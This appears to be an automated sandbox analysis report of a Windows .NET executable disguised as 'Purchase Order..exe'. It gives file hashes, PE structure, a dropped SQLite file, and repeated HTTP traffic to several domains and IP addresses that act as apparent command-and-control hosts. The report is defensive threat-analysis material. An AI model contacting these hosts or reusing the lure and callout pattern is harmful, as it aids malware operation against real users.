                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                          C:\Users\user\AppData\Local\Temp\l420377x

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\isoburn.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                          Category:dropped
                                                          Size (bytes):196608
                                                          Entropy (8bit):1.1209886597424439
                                                          Encrypted:false
                                                          SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8QbnVcxjONC4Je5Q:r2qOB1nxCkvSAELyKOMq+8QTQKC+
                                                          MD5:EFD26666EAE0E87B32082FF52F9F4C5E
                                                          SHA1:603BFE6A7D6C0EC4B8BA1D38AEA6EFADDC42B5E0
                                                          SHA-256:67D4CAA4255418EB18873F01597D1F4257C4146D1DCED78E26D5FD76B783F416
                                                          SHA-512:28ADD7B8D88795F191567FD029E9F8BC9AEF7584CE3CD56DB40BBA52BC8335F2D8E53A5CE44C153C13A31FD0BE1D76D1E558A4AA5987D5456C000C4D64F08EAA
                                                          Malicious:false
                                                          Reputation:moderate, very likely benign file
                                                          Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          Static File Info

                                                          General

                                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Entropy (8bit):7.807336323885174
                                                          TrID:
                                                          • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                          • Win32 Executable (generic) a (10002005/4) 49.78%
                                                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                          • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                                          File name:Purchase Order..exe
                                                          File size:766'976 bytes
                                                          MD5:ecb3a0578fe97356ed12da57bc6bbc36
                                                          SHA1:6dff87fc845846f7ea2a03d0b5eff42b8fbc9f86
                                                          SHA256:469bf1df653a45070717d7c7121dfb3cdd3ccd150f3182ff399a012dc5c95de7
                                                          SHA512:094000115e77fd364ee1fcf39a98796f9fc52166e0e7caf095cd7192e56bb7bef49738ade31a996968afceed01ededb969da668ed112971a98a3ec951b299970
                                                          SSDEEP:12288:QCIR4R52J+XtGPu5FmroVa84u1jK15YHXFFEMuaVp1zqKb9cj0C8YxwbIRi:HIeeHUFmr+wJEHXFbbVp1z5pE01HbI4
                                                          TLSH:93F412A85A56E416CB4153350EB2F2B957BC4FEEE90093538FDEAEEBF93AC145C40181
                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....iNg..............0..\...T......Zx... ........@.. ....................................@................................

                                                          File Icon

                                                          Icon Hash:033424c4c199d839

                                                          Static PE Info

                                                          General

                                                          Entrypoint:0x4b785a
                                                          Entrypoint Section:.text
                                                          Digitally signed:false
                                                          Imagebase:0x400000
                                                          Subsystem:windows gui
                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                          Time Stamp:0x674E69DE [Tue Dec 3 02:15:58 2024 UTC]
                                                          TLS Callbacks:
                                                          CLR (.Net) Version:
                                                          OS Version Major:4
                                                          OS Version Minor:0
                                                          File Version Major:4
                                                          File Version Minor:0
                                                          Subsystem Version Major:4
                                                          Subsystem Version Minor:0
                                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                          Entrypoint Preview

                                                          Instruction
                                                          jmp dword ptr [00402000h]
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al

                                                          Data Directories

                                                          NameVirtual AddressVirtual Size Is in Section
                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0xb78080x4f.text
                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0xb80000x4ca8.rsrc
                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0xbe0000xc.reloc
                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                          Sections

                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                          .text0x20000xb58600xb5c0075e2a0acf4d33cd9f0fe409065027fd3False0.938498054934663data7.816664771480419IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                          .rsrc0xb80000x4ca80x5000bd0c55937870d93130855f05ad818c74False0.917626953125data7.667223138106899IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                          .reloc0xbe0000xc0x400f7dc40ca0f0053ad1ceee1ab206b3fccFalse0.025390625data0.05585530805374581IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                          Resources

                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                          RT_ICON0xb81000x46f9PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9932852661126094
                                                          RT_GROUP_ICON0xbc80c0x14data1.05
                                                          RT_VERSION0xbc8300x278data0.46677215189873417
                                                          RT_MANIFEST0xbcab80x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                          Imports

                                                          DLLImport
                                                          mscoree.dll_CorExeMain

                                                          Network Behavior

                                                          Network Port Distribution

                                                          TCP Packets

                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Dec 3, 2024 14:26:29.870238066 CET4971480192.168.2.831.186.11.114
                                                          Dec 3, 2024 14:26:29.991128922 CET804971431.186.11.114192.168.2.8
                                                          Dec 3, 2024 14:26:29.991319895 CET4971480192.168.2.831.186.11.114
                                                          Dec 3, 2024 14:26:30.000993013 CET4971480192.168.2.831.186.11.114
                                                          Dec 3, 2024 14:26:30.121373892 CET804971431.186.11.114192.168.2.8
                                                          Dec 3, 2024 14:26:31.382671118 CET804971431.186.11.114192.168.2.8
                                                          Dec 3, 2024 14:26:31.382713079 CET804971431.186.11.114192.168.2.8
                                                          Dec 3, 2024 14:26:31.382811069 CET804971431.186.11.114192.168.2.8
                                                          Dec 3, 2024 14:26:31.382982016 CET4971480192.168.2.831.186.11.114
                                                          Dec 3, 2024 14:26:31.383028030 CET4971480192.168.2.831.186.11.114
                                                          Dec 3, 2024 14:26:31.386219978 CET4971480192.168.2.831.186.11.114
                                                          Dec 3, 2024 14:26:31.506444931 CET804971431.186.11.114192.168.2.8
                                                          Dec 3, 2024 14:26:47.773097038 CET4971680192.168.2.8194.76.119.60
                                                          Dec 3, 2024 14:26:47.893222094 CET8049716194.76.119.60192.168.2.8
                                                          Dec 3, 2024 14:26:47.894680023 CET4971680192.168.2.8194.76.119.60
                                                          Dec 3, 2024 14:26:47.969553947 CET4971680192.168.2.8194.76.119.60
                                                          Dec 3, 2024 14:26:48.089690924 CET8049716194.76.119.60192.168.2.8
                                                          Dec 3, 2024 14:26:49.226069927 CET8049716194.76.119.60192.168.2.8
                                                          Dec 3, 2024 14:26:49.226098061 CET8049716194.76.119.60192.168.2.8
                                                          Dec 3, 2024 14:26:49.226228952 CET4971680192.168.2.8194.76.119.60
                                                          Dec 3, 2024 14:26:49.476646900 CET4971680192.168.2.8194.76.119.60
                                                          Dec 3, 2024 14:26:50.495608091 CET4971780192.168.2.8194.76.119.60
                                                          Dec 3, 2024 14:26:50.616036892 CET8049717194.76.119.60192.168.2.8
                                                          Dec 3, 2024 14:26:50.616142035 CET4971780192.168.2.8194.76.119.60
                                                          Dec 3, 2024 14:26:50.630589008 CET4971780192.168.2.8194.76.119.60
                                                          Dec 3, 2024 14:26:50.750888109 CET8049717194.76.119.60192.168.2.8
                                                          Dec 3, 2024 14:26:51.983278990 CET8049717194.76.119.60192.168.2.8
                                                          Dec 3, 2024 14:26:51.983422995 CET8049717194.76.119.60192.168.2.8
                                                          Dec 3, 2024 14:26:51.983493090 CET4971780192.168.2.8194.76.119.60
                                                          Dec 3, 2024 14:26:52.132714987 CET4971780192.168.2.8194.76.119.60
                                                          Dec 3, 2024 14:26:53.151726007 CET4971880192.168.2.8194.76.119.60
                                                          Dec 3, 2024 14:26:53.271891117 CET8049718194.76.119.60192.168.2.8
                                                          Dec 3, 2024 14:26:53.272011995 CET4971880192.168.2.8194.76.119.60
                                                          Dec 3, 2024 14:26:53.286070108 CET4971880192.168.2.8194.76.119.60
                                                          Dec 3, 2024 14:26:53.406197071 CET8049718194.76.119.60192.168.2.8
                                                          Dec 3, 2024 14:26:53.406275988 CET8049718194.76.119.60192.168.2.8
                                                          Dec 3, 2024 14:26:54.641143084 CET8049718194.76.119.60192.168.2.8
                                                          Dec 3, 2024 14:26:54.695101976 CET4971880192.168.2.8194.76.119.60
                                                          Dec 3, 2024 14:26:54.761420965 CET8049718194.76.119.60192.168.2.8
                                                          Dec 3, 2024 14:26:54.761504889 CET4971880192.168.2.8194.76.119.60
                                                          Dec 3, 2024 14:26:54.816729069 CET4971880192.168.2.8194.76.119.60
                                                          Dec 3, 2024 14:26:55.823568106 CET4972080192.168.2.8194.76.119.60
                                                          Dec 3, 2024 14:26:55.943744898 CET8049720194.76.119.60192.168.2.8
                                                          Dec 3, 2024 14:26:55.943880081 CET4972080192.168.2.8194.76.119.60
                                                          Dec 3, 2024 14:26:55.953367949 CET4972080192.168.2.8194.76.119.60
                                                          Dec 3, 2024 14:26:56.073333979 CET8049720194.76.119.60192.168.2.8
                                                          Dec 3, 2024 14:26:57.317573071 CET8049720194.76.119.60192.168.2.8
                                                          Dec 3, 2024 14:26:57.317646980 CET8049720194.76.119.60192.168.2.8
                                                          Dec 3, 2024 14:26:57.317816973 CET4972080192.168.2.8194.76.119.60
                                                          Dec 3, 2024 14:26:57.320545912 CET4972080192.168.2.8194.76.119.60
                                                          Dec 3, 2024 14:26:57.440490961 CET8049720194.76.119.60192.168.2.8
                                                          Dec 3, 2024 14:27:03.641143084 CET4972280192.168.2.8103.224.182.242
                                                          Dec 3, 2024 14:27:03.761308908 CET8049722103.224.182.242192.168.2.8
                                                          Dec 3, 2024 14:27:03.761385918 CET4972280192.168.2.8103.224.182.242
                                                          Dec 3, 2024 14:27:03.776510000 CET4972280192.168.2.8103.224.182.242
                                                          Dec 3, 2024 14:27:03.896888018 CET8049722103.224.182.242192.168.2.8
                                                          Dec 3, 2024 14:27:05.017127991 CET8049722103.224.182.242192.168.2.8
                                                          Dec 3, 2024 14:27:05.017184019 CET8049722103.224.182.242192.168.2.8
                                                          Dec 3, 2024 14:27:05.017277956 CET4972280192.168.2.8103.224.182.242
                                                          Dec 3, 2024 14:27:05.289169073 CET4972280192.168.2.8103.224.182.242
                                                          Dec 3, 2024 14:27:06.307698965 CET4972380192.168.2.8103.224.182.242
                                                          Dec 3, 2024 14:27:06.427709103 CET8049723103.224.182.242192.168.2.8
                                                          Dec 3, 2024 14:27:06.427825928 CET4972380192.168.2.8103.224.182.242
                                                          Dec 3, 2024 14:27:06.441685915 CET4972380192.168.2.8103.224.182.242
                                                          Dec 3, 2024 14:27:06.561621904 CET8049723103.224.182.242192.168.2.8
                                                          Dec 3, 2024 14:27:07.710576057 CET8049723103.224.182.242192.168.2.8
                                                          Dec 3, 2024 14:27:07.710721016 CET8049723103.224.182.242192.168.2.8
                                                          Dec 3, 2024 14:27:07.710799932 CET4972380192.168.2.8103.224.182.242
                                                          Dec 3, 2024 14:27:07.948278904 CET4972380192.168.2.8103.224.182.242
                                                          Dec 3, 2024 14:27:08.963941097 CET4972480192.168.2.8103.224.182.242
                                                          Dec 3, 2024 14:27:09.084104061 CET8049724103.224.182.242192.168.2.8
                                                          Dec 3, 2024 14:27:09.084417105 CET4972480192.168.2.8103.224.182.242
                                                          Dec 3, 2024 14:27:09.098942995 CET4972480192.168.2.8103.224.182.242
                                                          Dec 3, 2024 14:27:09.219397068 CET8049724103.224.182.242192.168.2.8
                                                          Dec 3, 2024 14:27:09.219433069 CET8049724103.224.182.242192.168.2.8
                                                          Dec 3, 2024 14:27:10.373516083 CET8049724103.224.182.242192.168.2.8
                                                          Dec 3, 2024 14:27:10.373686075 CET8049724103.224.182.242192.168.2.8
                                                          Dec 3, 2024 14:27:10.373734951 CET4972480192.168.2.8103.224.182.242
                                                          Dec 3, 2024 14:27:10.605266094 CET4972480192.168.2.8103.224.182.242
                                                          Dec 3, 2024 14:27:11.620268106 CET4972580192.168.2.8103.224.182.242
                                                          Dec 3, 2024 14:27:11.740515947 CET8049725103.224.182.242192.168.2.8
                                                          Dec 3, 2024 14:27:11.740669966 CET4972580192.168.2.8103.224.182.242
                                                          Dec 3, 2024 14:27:11.750102043 CET4972580192.168.2.8103.224.182.242
                                                          Dec 3, 2024 14:27:11.870343924 CET8049725103.224.182.242192.168.2.8
                                                          Dec 3, 2024 14:27:13.061113119 CET8049725103.224.182.242192.168.2.8
                                                          Dec 3, 2024 14:27:13.061270952 CET8049725103.224.182.242192.168.2.8
                                                          Dec 3, 2024 14:27:13.061342955 CET8049725103.224.182.242192.168.2.8
                                                          Dec 3, 2024 14:27:13.061434031 CET4972580192.168.2.8103.224.182.242
                                                          Dec 3, 2024 14:27:13.063335896 CET4972580192.168.2.8103.224.182.242
                                                          Dec 3, 2024 14:27:13.064337969 CET4972580192.168.2.8103.224.182.242
                                                          Dec 3, 2024 14:27:13.184396029 CET8049725103.224.182.242192.168.2.8
                                                          Dec 3, 2024 14:27:18.373272896 CET4972680192.168.2.8188.114.96.6
                                                          Dec 3, 2024 14:27:18.493699074 CET8049726188.114.96.6192.168.2.8
                                                          Dec 3, 2024 14:27:18.493794918 CET4972680192.168.2.8188.114.96.6
                                                          Dec 3, 2024 14:27:18.509380102 CET4972680192.168.2.8188.114.96.6
                                                          Dec 3, 2024 14:27:18.629442930 CET8049726188.114.96.6192.168.2.8
                                                          Dec 3, 2024 14:27:19.780008078 CET8049726188.114.96.6192.168.2.8
                                                          Dec 3, 2024 14:27:19.780961037 CET8049726188.114.96.6192.168.2.8
                                                          Dec 3, 2024 14:27:19.781053066 CET4972680192.168.2.8188.114.96.6
                                                          Dec 3, 2024 14:27:20.023466110 CET4972680192.168.2.8188.114.96.6
                                                          Dec 3, 2024 14:27:21.072417021 CET4972780192.168.2.8188.114.96.6
                                                          Dec 3, 2024 14:27:21.192487955 CET8049727188.114.96.6192.168.2.8
                                                          Dec 3, 2024 14:27:21.192629099 CET4972780192.168.2.8188.114.96.6
                                                          Dec 3, 2024 14:27:21.221596956 CET4972780192.168.2.8188.114.96.6
                                                          Dec 3, 2024 14:27:21.341763020 CET8049727188.114.96.6192.168.2.8
                                                          Dec 3, 2024 14:27:22.371922016 CET8049727188.114.96.6192.168.2.8
                                                          Dec 3, 2024 14:27:22.372669935 CET8049727188.114.96.6192.168.2.8
                                                          Dec 3, 2024 14:27:22.372740984 CET4972780192.168.2.8188.114.96.6
                                                          Dec 3, 2024 14:27:22.726782084 CET4972780192.168.2.8188.114.96.6
                                                          Dec 3, 2024 14:27:23.797883034 CET4972880192.168.2.8188.114.96.6
                                                          Dec 3, 2024 14:27:23.918025970 CET8049728188.114.96.6192.168.2.8
                                                          Dec 3, 2024 14:27:23.918106079 CET4972880192.168.2.8188.114.96.6
                                                          Dec 3, 2024 14:27:23.949754953 CET4972880192.168.2.8188.114.96.6
                                                          Dec 3, 2024 14:27:24.069935083 CET8049728188.114.96.6192.168.2.8
                                                          Dec 3, 2024 14:27:24.069951057 CET8049728188.114.96.6192.168.2.8
                                                          Dec 3, 2024 14:27:25.141880989 CET8049728188.114.96.6192.168.2.8
                                                          Dec 3, 2024 14:27:25.143104076 CET8049728188.114.96.6192.168.2.8
                                                          Dec 3, 2024 14:27:25.143162012 CET4972880192.168.2.8188.114.96.6
                                                          Dec 3, 2024 14:27:25.461051941 CET4972880192.168.2.8188.114.96.6
                                                          Dec 3, 2024 14:27:26.700805902 CET4972980192.168.2.8188.114.96.6
                                                          Dec 3, 2024 14:27:26.822069883 CET8049729188.114.96.6192.168.2.8
                                                          Dec 3, 2024 14:27:26.822151899 CET4972980192.168.2.8188.114.96.6
                                                          Dec 3, 2024 14:27:26.835736990 CET4972980192.168.2.8188.114.96.6
                                                          Dec 3, 2024 14:27:26.956096888 CET8049729188.114.96.6192.168.2.8
                                                          Dec 3, 2024 14:27:28.045676947 CET8049729188.114.96.6192.168.2.8
                                                          Dec 3, 2024 14:27:28.045747042 CET8049729188.114.96.6192.168.2.8
                                                          Dec 3, 2024 14:27:28.046097994 CET4972980192.168.2.8188.114.96.6
                                                          Dec 3, 2024 14:27:28.046328068 CET8049729188.114.96.6192.168.2.8
                                                          Dec 3, 2024 14:27:28.046458006 CET4972980192.168.2.8188.114.96.6
                                                          Dec 3, 2024 14:27:28.049674034 CET4972980192.168.2.8188.114.96.6
                                                          Dec 3, 2024 14:27:28.169708967 CET8049729188.114.96.6192.168.2.8
                                                          Dec 3, 2024 14:27:33.371450901 CET4973080192.168.2.83.33.130.190
                                                          Dec 3, 2024 14:27:33.491476059 CET80497303.33.130.190192.168.2.8
                                                          Dec 3, 2024 14:27:33.491832018 CET4973080192.168.2.83.33.130.190
                                                          Dec 3, 2024 14:27:33.526524067 CET4973080192.168.2.83.33.130.190
                                                          Dec 3, 2024 14:27:33.646508932 CET80497303.33.130.190192.168.2.8
                                                          Dec 3, 2024 14:27:34.635354996 CET80497303.33.130.190192.168.2.8
                                                          Dec 3, 2024 14:27:34.635411024 CET4973080192.168.2.83.33.130.190
                                                          Dec 3, 2024 14:27:35.039391041 CET4973080192.168.2.83.33.130.190
                                                          Dec 3, 2024 14:27:35.159540892 CET80497303.33.130.190192.168.2.8
                                                          Dec 3, 2024 14:27:36.092796087 CET4973180192.168.2.83.33.130.190
                                                          Dec 3, 2024 14:27:36.213051081 CET80497313.33.130.190192.168.2.8
                                                          Dec 3, 2024 14:27:36.213126898 CET4973180192.168.2.83.33.130.190
                                                          Dec 3, 2024 14:27:36.266535044 CET4973180192.168.2.83.33.130.190
                                                          Dec 3, 2024 14:27:36.386820078 CET80497313.33.130.190192.168.2.8
                                                          Dec 3, 2024 14:27:37.309134960 CET80497313.33.130.190192.168.2.8
                                                          Dec 3, 2024 14:27:37.309844971 CET4973180192.168.2.83.33.130.190
                                                          Dec 3, 2024 14:27:37.775464058 CET4973180192.168.2.83.33.130.190
                                                          Dec 3, 2024 14:27:37.897176027 CET80497313.33.130.190192.168.2.8
                                                          Dec 3, 2024 14:27:38.792759895 CET4973280192.168.2.83.33.130.190
                                                          Dec 3, 2024 14:27:38.913177013 CET80497323.33.130.190192.168.2.8
                                                          Dec 3, 2024 14:27:38.913249969 CET4973280192.168.2.83.33.130.190
                                                          Dec 3, 2024 14:27:39.338541985 CET4973280192.168.2.83.33.130.190
                                                          Dec 3, 2024 14:27:39.458683968 CET80497323.33.130.190192.168.2.8
                                                          Dec 3, 2024 14:27:39.458761930 CET80497323.33.130.190192.168.2.8
                                                          Dec 3, 2024 14:27:40.065049887 CET80497323.33.130.190192.168.2.8
                                                          Dec 3, 2024 14:27:40.065154076 CET4973280192.168.2.83.33.130.190
                                                          Dec 3, 2024 14:27:40.851722002 CET4973280192.168.2.83.33.130.190
                                                          Dec 3, 2024 14:27:40.972326994 CET80497323.33.130.190192.168.2.8

                                                          UDP Packets

                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Dec 3, 2024 14:26:29.206685066 CET5574253192.168.2.81.1.1.1
                                                          Dec 3, 2024 14:26:29.863993883 CET53557421.1.1.1192.168.2.8
                                                          Dec 3, 2024 14:26:46.433046103 CET5304353192.168.2.81.1.1.1
                                                          Dec 3, 2024 14:26:47.429888964 CET5304353192.168.2.81.1.1.1
                                                          Dec 3, 2024 14:26:47.770526886 CET53530431.1.1.1192.168.2.8
                                                          Dec 3, 2024 14:26:47.770540953 CET53530431.1.1.1192.168.2.8
                                                          Dec 3, 2024 14:27:02.340909958 CET6369353192.168.2.81.1.1.1
                                                          Dec 3, 2024 14:27:03.354394913 CET6369353192.168.2.81.1.1.1
                                                          Dec 3, 2024 14:27:03.638592958 CET53636931.1.1.1192.168.2.8
                                                          Dec 3, 2024 14:27:03.639496088 CET53636931.1.1.1192.168.2.8
                                                          Dec 3, 2024 14:27:18.082979918 CET5300253192.168.2.81.1.1.1
                                                          Dec 3, 2024 14:27:18.365046024 CET53530021.1.1.1192.168.2.8
                                                          Dec 3, 2024 14:27:33.066659927 CET5950253192.168.2.81.1.1.1
                                                          Dec 3, 2024 14:27:33.366341114 CET53595021.1.1.1192.168.2.8

                                                          DNS Queries

                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                          Dec 3, 2024 14:26:29.206685066 CET192.168.2.81.1.1.10xb1aStandard query (0)www.cyperla.xyzA (IP address)IN (0x0001)false
                                                          Dec 3, 2024 14:26:46.433046103 CET192.168.2.81.1.1.10xcdcaStandard query (0)www.cstrategy.onlineA (IP address)IN (0x0001)false
                                                          Dec 3, 2024 14:26:47.429888964 CET192.168.2.81.1.1.10xcdcaStandard query (0)www.cstrategy.onlineA (IP address)IN (0x0001)false
                                                          Dec 3, 2024 14:27:02.340909958 CET192.168.2.81.1.1.10xb227Standard query (0)www.madhf.techA (IP address)IN (0x0001)false
                                                          Dec 3, 2024 14:27:03.354394913 CET192.168.2.81.1.1.10xb227Standard query (0)www.madhf.techA (IP address)IN (0x0001)false
                                                          Dec 3, 2024 14:27:18.082979918 CET192.168.2.81.1.1.10xfeddStandard query (0)www.bser101pp.buzzA (IP address)IN (0x0001)false
                                                          Dec 3, 2024 14:27:33.066659927 CET192.168.2.81.1.1.10x16c7Standard query (0)www.goldstarfootwear.shopA (IP address)IN (0x0001)false

                                                          DNS Answers

                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                          Dec 3, 2024 14:26:29.863993883 CET1.1.1.1192.168.2.80xb1aNo error (0)www.cyperla.xyzcyperla.xyzCNAME (Canonical name)IN (0x0001)false
                                                          Dec 3, 2024 14:26:29.863993883 CET1.1.1.1192.168.2.80xb1aNo error (0)cyperla.xyz31.186.11.114A (IP address)IN (0x0001)false
                                                          Dec 3, 2024 14:26:47.770526886 CET1.1.1.1192.168.2.80xcdcaNo error (0)www.cstrategy.onlinecstrategy.onlineCNAME (Canonical name)IN (0x0001)false
                                                          Dec 3, 2024 14:26:47.770526886 CET1.1.1.1192.168.2.80xcdcaNo error (0)cstrategy.online194.76.119.60A (IP address)IN (0x0001)false
                                                          Dec 3, 2024 14:26:47.770540953 CET1.1.1.1192.168.2.80xcdcaNo error (0)www.cstrategy.onlinecstrategy.onlineCNAME (Canonical name)IN (0x0001)false
                                                          Dec 3, 2024 14:26:47.770540953 CET1.1.1.1192.168.2.80xcdcaNo error (0)cstrategy.online194.76.119.60A (IP address)IN (0x0001)false
                                                          Dec 3, 2024 14:27:03.638592958 CET1.1.1.1192.168.2.80xb227No error (0)www.madhf.tech103.224.182.242A (IP address)IN (0x0001)false
                                                          Dec 3, 2024 14:27:03.639496088 CET1.1.1.1192.168.2.80xb227No error (0)www.madhf.tech103.224.182.242A (IP address)IN (0x0001)false
                                                          Dec 3, 2024 14:27:18.365046024 CET1.1.1.1192.168.2.80xfeddNo error (0)www.bser101pp.buzz188.114.96.6A (IP address)IN (0x0001)false
                                                          Dec 3, 2024 14:27:18.365046024 CET1.1.1.1192.168.2.80xfeddNo error (0)www.bser101pp.buzz188.114.97.6A (IP address)IN (0x0001)false
                                                          Dec 3, 2024 14:27:33.366341114 CET1.1.1.1192.168.2.80x16c7No error (0)www.goldstarfootwear.shopgoldstarfootwear.shopCNAME (Canonical name)IN (0x0001)false
                                                          Dec 3, 2024 14:27:33.366341114 CET1.1.1.1192.168.2.80x16c7No error (0)goldstarfootwear.shop3.33.130.190A (IP address)IN (0x0001)false
                                                          Dec 3, 2024 14:27:33.366341114 CET1.1.1.1192.168.2.80x16c7No error (0)goldstarfootwear.shop15.197.148.33A (IP address)IN (0x0001)false

                                                          HTTP Request Dependency Graph

                                                          • www.cyperla.xyz
                                                          • www.cstrategy.online
                                                          • www.madhf.tech
                                                          • www.bser101pp.buzz
                                                          • www.goldstarfootwear.shop

                                                          HTTP Packets

                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          0192.168.2.84971431.186.11.11480516C:\Program Files (x86)\yjAxJHetqDRsidHqvGJLEyrzfgYdfynZCsNoLNMaoLwmRYeWrjES\jfBrBcvTIMPfDU.exe
                                                          TimestampBytes transferredDirectionData
